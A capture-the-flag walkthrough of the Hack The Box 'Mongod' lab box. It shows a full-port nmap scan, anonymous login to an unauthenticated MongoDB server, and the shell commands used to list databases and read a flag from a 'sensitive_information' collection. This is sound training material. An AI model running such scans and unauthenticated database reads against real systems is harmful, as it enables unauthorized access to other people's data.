HTB Mongod

This is another of the Very easy HTB Starting Point boxes.

$ nmap -sV -p- 10.129.143.75 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-08 16:50 CEST
Nmap scan report for 10.129.143.75
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

As we can see in the Nmap results we hava a MongoDB version 3.6.8

MongoDB is a NoSQL database.
You can find more information in their documentation here: https://www.mongodb.com/docs

To be able to interact with the db, we need to install the MongoDB package into our Kali Linux.

it is included in the Kali repository, so we just need to use our apt.

$ sudo apt install mongodb

We try to connect and we realise that anonymous users can connect to, so no credentials are needed.

$ mongo mongodb://10.129.143.75:27017

MongoDB shell version v6.0.1
connecting to: mongodb://10.129.143.75:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d732a698-b4ef-42d3-b3ae-d608e4802c33") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
	https://community.mongodb.com
---
The server generated these startup warnings when booting: 
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] 
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] 
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] 
---
>

Now we can list the databases available in the server with show dbs command.

>show dbs

admin                  0.000GB
config                 0.000GB
local                  0.000GB
sensitive_information  0.000GB
users                  0.000GB

With use <database_name> we can switch to the corresponding database.

>use sensitive_information

switched to db sensitive_information

show collections will print a list of all collections for the current database.

>show collections

flag

db.collection.find().pretty() find all documents in the collection and return the content in a format that is easy to read.

>db.flag.find().pretty()

{
	"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
	"flag" : "1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
}

Our flag is then: 1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *